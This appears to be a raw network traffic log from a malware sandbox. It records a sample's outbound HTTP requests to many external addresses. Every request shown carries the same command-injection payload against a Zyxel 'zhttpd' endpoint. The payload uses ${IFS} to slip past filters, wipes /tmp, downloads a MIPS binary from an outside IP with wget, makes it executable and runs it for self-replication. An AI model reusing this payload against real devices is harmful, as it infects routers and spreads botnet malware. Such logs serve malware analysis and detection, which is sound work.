                                            Jan 14, 2024 15:50:47.593626976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6532192.168.2.233909053.96.171.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593661070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6533192.168.2.234465618.105.124.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593688965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6534192.168.2.2340500187.16.78.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593704939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6535192.168.2.233285460.221.190.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593744993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6536192.168.2.2346464101.232.243.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593744993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6537192.168.2.2357008200.206.16.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593776941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6538192.168.2.2347444118.127.145.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593830109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6539192.168.2.233752452.207.69.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593856096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6540192.168.2.235726613.154.239.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593902111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6541192.168.2.233717617.226.102.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593919992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6542192.168.2.2336600121.4.200.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593962908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6543192.168.2.2337950144.59.99.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593962908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6544192.168.2.2352438155.132.81.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593971968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6545192.168.2.2360324182.217.214.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594036102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6546192.168.2.2342252168.111.232.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594057083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6547192.168.2.2359174140.3.57.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594086885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6548192.168.2.2346870151.109.251.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594108105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6549192.168.2.235759098.248.77.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594151020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6550192.168.2.234335036.99.43.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594189882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6551192.168.2.2338472189.175.68.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594216108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6552192.168.2.2345488149.120.109.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594249010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6553192.168.2.2338466105.205.137.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594270945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6554192.168.2.2359432202.120.103.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594295025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6555192.168.2.234865696.151.94.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594355106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6556192.168.2.2343326207.46.69.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594386101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6557192.168.2.2343320208.181.2.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594405890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6558192.168.2.2354268162.197.229.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594444990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6559192.168.2.236032468.93.35.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594479084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6560192.168.2.2351526105.227.29.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594510078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6561192.168.2.233892095.170.150.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594546080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6562192.168.2.234413451.218.222.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594569921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6563192.168.2.23420461.203.137.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594580889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6564192.168.2.2354834190.204.33.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594613075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6565192.168.2.2346884146.38.204.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594644070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6566192.168.2.2335730200.237.55.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594664097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6567192.168.2.2343818173.144.81.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594690084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6568192.168.2.2360948186.104.110.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594722986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6569192.168.2.234838260.91.247.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594768047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6570192.168.2.23485781.179.204.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594788074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6571192.168.2.234221460.119.178.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594834089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6572192.168.2.2351230154.207.187.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594855070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6573192.168.2.233831242.34.46.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594886065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6574192.168.2.2345998203.203.248.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594903946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6575192.168.2.2338368190.195.69.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594949961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6576192.168.2.233813478.248.18.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.594975948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6577192.168.2.234648447.50.109.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595009089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6578192.168.2.2347972140.176.231.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595030069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6579192.168.2.236089876.149.136.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595062971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6580192.168.2.2335374148.190.171.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595091105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6581192.168.2.234463224.127.66.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595135927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6582192.168.2.234487691.0.11.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595159054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6583192.168.2.2335288104.244.65.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595185041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6584192.168.2.2357022131.158.121.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595211029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6585192.168.2.234879698.162.179.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595233917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6586192.168.2.2357956153.33.50.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595280886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6587192.168.2.233710095.101.123.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595299006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6588192.168.2.234691290.81.231.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595328093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6589192.168.2.2360418221.238.176.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595366001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6590192.168.2.234693062.157.255.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595406055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6591192.168.2.2357514195.205.224.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595421076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6592192.168.2.2359872221.0.55.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595448017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6593192.168.2.2352752182.199.178.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595501900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6594192.168.2.2347536130.164.126.203443
                                            TimestampBytes transferredDirectionData
